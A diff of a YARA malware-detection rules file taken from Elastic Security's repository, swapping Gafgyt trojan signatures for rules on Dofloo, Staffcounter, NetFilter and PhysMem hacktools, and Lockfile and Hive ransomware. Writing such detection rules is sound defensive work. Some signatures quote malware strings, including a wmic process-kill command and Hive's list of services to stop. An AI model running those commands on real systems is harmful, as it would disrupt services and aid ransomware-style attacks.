"https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1089-L1107" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" - logic_hash = "a06d9e1190ba79b0e19cab7468f01a49359629a6feb27b7d72f3d1d52d1483d7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dofloo.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88d826bac06c29e1b9024baaf90783e15d87d2a5c8c97426cbd5a70ae0f99461" + logic_hash = "c5e15e21946816052d5a8dc293db3830f1d6d06cdbf22eb8667b655206dbbc1f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f" + fingerprint = "c4bb948b85777b1f5df89fafba0674bc245bbda1962c576abaf0752f49c747d0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72864,27 +73239,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_32Eb0C81 : FILE MEMORY os = "linux" strings: - $a = { D4 48 FF 45 F0 48 8B 45 F0 0F B6 00 84 C0 75 DB EB 12 48 8B } + $a = { 10 88 45 DB 83 EC 04 8B 45 F8 83 C0 03 89 45 D4 8B 45 D4 89 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_9Abf7E0C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dofloo_29C12775 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Trojan Dofloo (Linux.Trojan.Dofloo)" author = "Elastic Security" - id = "9abf7e0c-5076-4881-a488-f0f62810f843" + id = "29c12775-b7e5-417d-9789-90b9bd4529dd" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1109-L1126" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "00276330e388d07368577c4134343cb9fc11957dba6cff5523331199f1ed04aa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dofloo.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88d826bac06c29e1b9024baaf90783e15d87d2a5c8c97426cbd5a70ae0f99461" + logic_hash = "a8eb79fdf57811f4ffd5a7c5ec54cf46c06281f8cd4d677aec1ad168d6648a08" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7d02513aaef250091a58db58435a1381974e55c2ed695c194b6b7b83c235f848" + fingerprint = "fbf49f0904e22c4d788f151096f9b1d80aa8c739b31705e6046d17029a6a7a4f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72892,85 +73268,88 @@ rule ELASTIC_Linux_Trojan_Gafgyt_9Abf7E0C : FILE MEMORY os = "linux" strings: - $a = { 55 E0 0F B6 42 0D 83 C8 01 88 42 0D 48 8B 55 E0 0F B6 42 0D 83 } + $a = { 00 2F 7E 49 00 64 80 49 00 34 7F 49 00 04 7F 49 00 24 80 49 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_33801844 : FILE MEMORY +rule ELASTIC_Linux_Virus_Staffcounter_D2D608A8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Virus Staffcounter (Linux.Virus.Staffcounter)" author = "Elastic Security" - id = "33801844-50b1-4968-a1b7-d106f16519ee" - date = "2021-01-12" + id = "d2d608a8-2d65-4b10-be71-0a0a6a027920" + date = "2021-06-28" modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1128-L1146" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2ceff60e88c30c02c1c7b12a224aba1895669aad7316a40b575579275b3edbb3" - logic_hash = "20b8ebce14776e48310be099afd0dca0f28778d0024318b339b75e2689f70128" + reference = "06e562b54b7ee2ffee229c2410c9e2c42090e77f6211ce4b9fa26459ff310315" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Virus_Staffcounter.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e30f1312eb1cbbc4faba3f67527a4e0e955b5684a1ba58cdd82a7a0f1ce3d2b9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "36218345b9ce4aaf50b5df1642c00ac5caa744069e952eb6008a9a57a37dbbdc" - severity = 100 + fingerprint = "a791024dc3064ed2e485e5c57d7ab77fc1ec14665c9302b8b572ac4d9d5d2f93" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 45 F8 48 83 E8 01 0F B6 00 3C 0D 75 0B 48 8B 45 F8 0F B6 00 } + $a = { 20 22 00 20 4C 69 6E 75 78 22 20 3C 00 54 6F 3A 20 22 00 20 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_A33A8363 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Lockfile_74185716 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Ransomware Lockfile (Windows.Ransomware.Lockfile)" author = "Elastic Security" - id = "a33a8363-5511-4fe1-a0d8-75156b9ccfc7" - date = "2021-01-12" - modified = "2021-09-16" + id = "74185716-e79d-4d63-b6ae-9480f24dcd4f" + date = "2021-08-31" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1148-L1165" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "3fe17dc43f07dacdad6ababf141983854b977e244c0af824fea0ab953ad70fee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Lockfile.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce" + logic_hash = "e922c2fc9dd52dd0238847a9d48691bea90d028cf680fc3a1a0dbdfef1d8dce3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08" + fingerprint = "849a0fb5a2e08b2d32db839a7fdbde03a184a48726678e65e7f8452b354a3ca8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E } + $a1 = "LOCKFILE-README" + $a2 = "wmic process where \"name like '%virtualbox%'\" call terminate" + $a3 = "" + $a4 = ".lockfile" condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_9A62845F : FILE MEMORY +rule ELASTIC_Linux_Virus_Rst_1214E2Ae : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Virus Rst (Linux.Virus.Rst)" author = "Elastic Security" - id = "9a62845f-6311-49ae-beac-f446b2909d9c" - date = "2021-01-12" + id = "1214e2ae-90e4-425e-b47f-0a0981623236" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1167-L1185" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f67f8566beab9d7494350923aceb0e76cd28173bdf2c4256e9d45eff7fc8cb41" - logic_hash = "b3ab125c8bfb5b7a0be0e92cf5a50057e403ab3597698ec2e7a8bafa0d3a8b80" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Virus_Rst.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b0e4f44d2456960bb6b20cb468c4ca1390338b83774b7af783c3d03e49eebe44" + logic_hash = "82de4a97f414d591daba2d5d49b941ec4c51d6a6af36f97f062eaac5c74ebe30" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2ccc813c5efed35308eb2422239b5b83d051eca64b7c785e66d602b13f8bd9b4" + fingerprint = "a13a9825815a417be991db57f80dac4d0c541e303e4a4e6bd03c46ece73703ea" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72978,339 +73357,366 @@ rule ELASTIC_Linux_Trojan_Gafgyt_9A62845F : FILE MEMORY os = "linux" strings: - $a = { 10 83 F8 20 7F 1E 83 7D 08 07 75 33 8B 45 0C 83 C0 18 8B 00 83 } + $a = { 00 00 00 53 89 F3 CD 80 5B 58 5F 5E 5A 59 5B C3 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_4D81Ad42 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Netfilter_E8243Dae : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" author = "Elastic Security" - id = "4d81ad42-bf08-48a9-9a93-85cb491257b3" - date = "2021-04-06" - modified = "2021-09-16" + id = "e8243dae-33d9-4b54-8f4a-ba5cf5241767" + date = "2022-04-04" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1187-L1205" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3021a861e6f03df3e7e3919e6255bdae6e48163b9a8ba4f1a5c5dced3e3e368b" - logic_hash = "57b54eed37690949ba2d4eff713691f16f00207d7b374beb7dfa2e368588dbb0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_NetFilter.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "760be95d4c04b10df89a78414facf91c0961020e80561eee6e2cb94b43b76510" + logic_hash = "c551bd87e73f980d8836b13449490de5e639d768b72d9006d90969f3140b28e2" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f285683c3b145990e1b6d31d3c9d09177ebf76f183d0fa336e8df3dbcba24366" - severity = 100 + tags = "FILE" + fingerprint = "1542c32471f5d3f20beeb60c696085548d675f5d1cab1a0ef85a7060b01f0349" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0F 44 C8 07 0B BF F1 1B 7E 83 CD FF 31 DB 2E 22 } + $str1 = "[NetFlt]:CTRL NDIS ModifyARP" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Gafgyt_6A510422 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Netfilter_Dd576D28 : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" author = "Elastic Security" - id = "6a510422-3662-4fdb-9c03-0101f16e87cd" - date = "2021-06-28" - modified = "2021-09-16" - reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1207-L1225" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "4384536817bf5df223d4cf145892b7714f2dbd1748930b6cd43152d4e35c9e56" + id = "dd576d28-b3e7-46b7-b19f-af37af434082" + date = "2022-04-04" + modified = "2023-06-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_NetFilter.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88cfe6d7c81d0064045c4198d6ec7d3c50dc3ec8e36e053456ed1b50fc8c23bf" + logic_hash = "7635ed94ca77c7705df4d2a9c5546ece86bf831b5bf5355943419174e0387b86" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75" - severity = 100 + tags = "FILE" + fingerprint = "b47477c371819a456ab24e158d6649e89b4d1756dc6da0b783b351d40b034fac" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0B E5 24 30 1B E5 2C 30 0B E5 1C 00 00 EA 18 30 1B E5 00 30 } + $str1 = "\\NetProxyDriver.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Gafgyt_D2953F92 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Netfilter_B4F2A520 : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" author = "Elastic Security" - id = "d2953f92-62ee-428d-88c5-723914c88c6e" - date = "2021-06-28" - modified = "2021-09-16" - reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1227-L1245" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d0af462d26f6ffe469c57d63f1f7d551e3fb9cc39c7e4c35b3e71f659c01c076" + id = "b4f2a520-88bf-447e-bbc4-5d8bfd2c9753" + date = "2022-04-04" + modified = "2023-06-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_NetFilter.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5d0d5373c5e52c4405f4bd963413e6ef3490b7c4c919ec2d4e3fb92e91f397a0" + logic_hash = "520d2194593f1622a3b905fe182a0773447a4eee3472e7701cce977f5bf4fbae" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc" - severity = 100 + tags = "FILE" + fingerprint = "1d8da6f78149e2db6b54faa381ce8eb285930226a5b4474e04937893c831809f" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 1B E5 2A 00 53 E3 0A 00 00 0A 30 30 1B E5 3F 00 53 E3 23 00 } + $str1 = "\\netfilterdrv.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Gafgyt_6Ae4B580 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Netfilter_1Cae6E26 : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" author = "Elastic Security" - id = "6ae4b580-f7cf-4318-b584-7ea15f10f5ea" - date = "2021-06-28" - modified = "2021-09-16" - reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1247-L1265" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "eb0fe44df1c995c5d4e3a361c3e466f78cb70bffbc76d1b7b345ee651b313b9e" + id = "1cae6e26-b0ce-4f53-b88d-975b52ebcca7" + date = "2022-04-04" + modified = "2023-06-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_NetFilter.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e2ec3b2a93c473d88bfdf2deb1969d15ab61737acc1ee8e08234bc5513ee87ea" + logic_hash = "29c0edc03934e6e7275c3870a8808e03ec85dacb1f54e10efca3123d2257db98" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "279e344d6da518980631e70d7b1ded4ff1b034d24e4b4fe01b36ed62f5c1176c" - severity = 100 + tags = "FILE" + fingerprint = "27003a6c9ad814e1ab2e7e284acfebdd18c9dd2af66eb9f44e5a9d59445fa086" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 30 0B E5 3C 20 1B E5 6C 32 1B E5 03 00 52 E1 01 00 00 DA 6C } + $str1 = "\\Driver_Map.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Gafgyt_D608Cf3B : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Physmem_Cc0978Df : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Name: physmem.sys" author = "Elastic Security" - id = "d608cf3b-c255-4a8d-9bf1-66f92eacd751" - date = "2021-06-28" - modified = "2021-09-16" - reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1267-L1285" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "ad5b7d32c85adc7f778a8f4815e595b90a6f15dec048bcf97c6ab179582eb4f7" + id = "cc0978df-153e-4421-8be8-37a0824133e2" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_PhysMem.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d" + logic_hash = "e2fabf5889dbdc98dc6942be4fb0de4351d64a06bab945993b2a2c4afe89984e" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "3825aa1c9cddb46fdef6abc0503b42acbca8744dd89b981a3eea8db2f86a8a76" - severity = 100 + tags = "FILE" + fingerprint = "b94d5530dc3db4101b6ef06dc2421a10785f47bcb26d54f309a250a68699fa83" + threat_name = "Windows.Hacktool.PhysMem" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FF 2F E1 7E 03 00 00 78 D8 00 00 24 00 00 00 28 00 00 00 4C } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 70 00 68 00 79 00 73 00 6D 00 65 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Linux_Trojan_Gafgyt_3F8Cf56E : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Physmem_B3Fa382B : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Physmem (Windows.Hacktool.PhysMem)" author = "Elastic Security" - id = "3f8cf56e-a8cb-4c03-8829-f1daa3dc64a8" - date = "2021-06-28" - modified = "2021-09-16" - reference = "1878f0783085cc6beb2b81cfda304ec983374264ce54b6b98a51c09aea9f750d" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1287-L1305" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "b2cf8b1913a88e6a6346f0ac8cd2e7c33b41d44bf60ff7327ae40a2d54748bd9" + id = "b3fa382b-48a5-4004-92ad-bba0d42243ad" + date = "2022-04-04" + modified = "2022-04-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_PhysMem.yar#L22-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88df37ede18bea511f1782c1a6c4915690b29591cf2c1bf5f52201fbbb4fa2b9" + logic_hash = "36a60b78de15a52721ad4830b37daffc33d7689e8b180fe148876da00562273a" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "77306f0610515434371f70f2b42c895cdc5bbae2ef6919cf835b3cfe2e4e4976" - severity = 100 + tags = "FILE" + fingerprint = "81285d1d8bdb575cb3ebf7f2df2555544e3f1342917e207def00c358a77cd620" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 2F DA E8 E9 CC E4 F4 39 55 E2 9E 33 0E C0 F0 FB 26 93 31 } + $str1 = "\\Phymemx64.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Gafgyt_Fb14E81F : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Hive_55619Cd0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Ransomware Hive (Windows.Ransomware.Hive)" author = "Elastic Security" - id = "fb14e81f-be2a-4428-9877-958e394a7ae2" - date = "2022-01-05" - modified = "2022-01-26" - reference = "0fd07e6068a721774716eb4940e2c19faef02d5bdacf3b018bf5995fa98a3a27" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1307-L1325" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2efb958c269640c374485502611372f4404cf35d7ab704d20ce37b8c1f69645d" + id = "55619cd0-6013-45e2-b15e-0dceff9571ab" + date = "2021-08-26" + modified = "2022-01-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Hive.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609" + logic_hash = "51e2b03a9f9b92819bbf05ecbb33a23662a40e7d51f9812aa8243c4506057f1f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "12b430108256bd0f57f48b9dbbea12eba7405c0b3b66a1c4b882647051f1ec52" + fingerprint = "04df3169c50fbab4e2b495de5500c62ddf5e76aa8b4a7fc8435f39526f69c52b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4E 45 52 00 53 43 41 4E 4E 45 52 20 4F 4E 20 7C 20 4F 46 46 00 } + $a1 = "google.com/encryptor.(*App).KillProcesses" ascii fullword + $a2 = "- Do not shutdown or reboot your computers, unmount external storages." ascii fullword + $a3 = "hive" condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_E09726Dc : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Hive_3Ed67Fe6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Ransomware Hive (Windows.Ransomware.Hive)" author = "Elastic Security" - id = "e09726dc-4e6d-4115-b178-d20375c09e04" - date = "2022-01-05" - modified = "2022-01-26" - reference = "1e64187b5e3b5fe71d34ea555ff31961404adad83f8e0bd1ce0aad056a878d73" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1327-L1345" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "ebd00e593a7fcd46e36fd0ca213e1f82c0f4a94448b6fd605d35cea45a490493" + id = "3ed67fe6-6347-4aef-898d-4cb267bcbfc7" + date = "2021-08-26" + modified = "2022-01-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Hive.yar#L23-L45" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609" + logic_hash = "a599f0d528bdbec00afa7e9a5cddec5e799ee755a7f30af70dde7d2459b70155" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "614d54b3346835cd5c2a36a54cae917299b1a1ae0d057e3fa1bb7dddefc1490f" + fingerprint = "a15acde0841f08fc44fdc1fea01c140e9e8af6275a65bec4a7b762494c9e6185" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 48 83 EC 08 48 83 C4 08 C3 00 00 00 01 00 02 00 50 49 4E 47 } + $a1 = "bmr|sql|oracle|postgres|redis|vss|backup|sstp" + $a2 = "key.hive" + $a3 = "Killing processes" + $a4 = "Stopping services" + $a5 = "Removing itself" condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Ad12B9B6 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Hive_B97Ec33B : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Ransomware Hive (Windows.Ransomware.Hive)" author = "Elastic Security" - id = "ad12b9b6-2e66-4647-8bf3-0300f2124a97" - date = "2022-01-05" - modified = "2022-01-26" - reference = "f0411131acfddb40ac8069164ce2808e9c8928709898d3fb5dc88036003fe9c8" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1347-L1365" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "72a85d14eb8ab78364ea2e8b89d9409c0046b14602f4a3415d829f4985fb2de3" + id = "b97ec33b-d4cf-4b70-8ce8-8a5d20448643" + date = "2021-08-26" + modified = "2022-01-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = 